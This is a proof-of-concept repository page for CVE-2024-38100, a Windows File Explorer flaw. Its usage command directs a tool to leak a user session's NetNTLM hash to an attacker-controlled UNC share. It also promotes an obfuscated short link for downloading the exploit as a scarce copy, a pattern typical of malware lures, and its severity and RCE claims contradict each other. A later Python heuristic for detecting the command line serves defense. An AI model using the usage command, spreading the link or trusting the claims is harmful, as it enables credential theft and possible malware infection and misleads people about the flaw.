CVE-2024-38100 PoC — Microsoft Windows File Explorer Security Vulnerability

Source
Associated Vulnerability
Title: Microsoft Windows File Explorer Security Vulnerability (CVE-2024-38100)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft (USA). Microsoft Windows File Explorer contains a security vulnerability. An attacker can exploit this vulnerability to elevate privileges. The following products and versions are affected: Windows Server 2019, Windows Server 2019 (Server Core installation), Windows Server 2022, Windows Server 2022 (Server Core install
Description
CVE-2024-38100 Windows Leaked Wallpaper Escalation to RCE vulnerability
Readme
# CVE-2024-38100
CVE-2024-38100 Windows Leaked Wallpaper Escalation to RCE vulnerability

![CVE-2024-38100](three.png?raw=true "CVE-2024-38100")


## CVE description
In a recent security bulletin, Microsoft disclosed a critical vulnerability in Windows File Explorer, identified as CVE-2024-38100, with a CVSS score of 7.8. This is a privilege escalation tool that allows us to leak a user's NetNTLM hash from any session on a computer and gain Remote Code Execution.

Usage:
```
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg

# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg
```

![CVE-2024-38100](two.png?raw=true "CVE-2024-38100")

![CVE-2024-38100](three.png?raw=true "CVE-2024-38100")


## Who is vulnerable?
Tested vulnerable hosts:
Any system that has not received the July Patch Tuesday update.


## CVE-2024-38100 download exploit
As mentioned at the beginning, CVE-2024-38100 was given such a high CVSS score because it is remote code execution. This means it can go unnoticed by the user and potentially by the security team as well. Such a powerful tool should not be fully public; there are strictly only a few copies available so a REAL researcher can use it: https:// shorturl[.]at/5xHw2

This should attract attention to the importance of cyber security. It can be tempting to ignore it, or palm it off to the IT team, but both of these options can leave you susceptible to real and damaging risks. Do NOT resell or leak this PoC or you can be at risk of breaking the law.


## Patching
Microsoft addressed this vulnerability in the July Patch Tuesday update, releasing the fix under KB5040434.

## Detection
No detection yet.
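
A heuristic for the command-line shape shown under Usage (a numeric session argument followed by a UNC path to an image file), as an added example that is not part of the original README or the project's code. It assumes process-creation command lines are being logged (for instance Sysmon Event ID 1 or Security Event 4688 with command-line auditing); the sample records and the trusted host name `fileserver01` are constructed.

```python
import ipaddress
import re

# Constructed sample process-creation records (image, command line); not real logs.
SAMPLE_EVENTS = [
    (r"C:\Users\bob\LeakedWallpaper.exe", r".\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg"),
    (r"C:\Temp\svc.exe", r"svc.exe 2 \\10.9.8.7\share\bg.PNG"),
    (r"C:\Windows\explorer.exe", r"explorer.exe \\fileserver01\public\logo.jpg"),
    (r"C:\Windows\System32\robocopy.exe", r"robocopy \\172.16.0.9\backup D:\restore /E"),
]

# UNC path of the form \\host\share\...\file.<image extension>.
UNC_IMAGE = re.compile(
    r"\\\\(?P<host>[^\\\s]+)\\(?P<share>[^\\\s]+)\\\S*\.(?:jpe?g|png|bmp|gif)\b",
    re.IGNORECASE,
)
# A bare integer argument directly before the UNC path, like <session> in the usage.
SESSION_ARG = re.compile(r"(?:^|\s)\d{1,5}\s+\\\\")


def inspect_cmdline(cmdline, trusted_hosts=frozenset()):
    """Return a finding for a remote image UNC path on an untrusted host, else None.

    The executable name is ignored on purpose: a binary can be renamed,
    the argument shape cannot be changed as easily.
    """
    m = UNC_IMAGE.search(cmdline)
    if not m or m.group("host").lower() in trusted_hosts:
        return None
    host = m.group("host").lower()
    reasons = ["image file on untrusted UNC host"]
    try:
        ipaddress.ip_address(host)
        reasons.append("host is an IP literal")
    except ValueError:
        pass  # a hostname, not an IP address
    if m.group("share").endswith("$"):
        reasons.append("administrative share")
    if SESSION_ARG.search(cmdline):
        reasons.append("numeric argument before path")
    return {"host": host, "score": len(reasons), "reasons": reasons}


def triage(events, trusted_hosts=frozenset(), threshold=3):
    """Return (image, finding) pairs whose score reaches the alert threshold."""
    hits = []
    for image, cmdline in events:
        finding = inspect_cmdline(cmdline, trusted_hosts)
        if finding and finding["score"] >= threshold:
            hits.append((image, finding))
    return hits
```

Findings below the threshold are worth keeping as hunting leads, since legitimate wallpaper or logo paths on internal file servers match the base pattern too.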

## Mitigation
Users and administrators are strongly advised to apply this update immediately to protect their systems from potential exploitation.


## Disclaimer

This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The authors of this project are not responsible for any damages caused by direct or indirect use of the information or functionality provided by these scripts.
File Snapshot

[4.0K] /data/pocs/de0767005ea73d6d8de52da3834f2f345ee03ecd
├── [1.1K] automate.py
├── [1.1K] check_targets.py
├── [1.1K] CVE-2024-38100.py
├── [ 15M] demo.mkv
├── [ 56K] one.png
├── [2.0K] README.md
├── [742K] three.png
└── [232K] two.png

0 directories, 8 files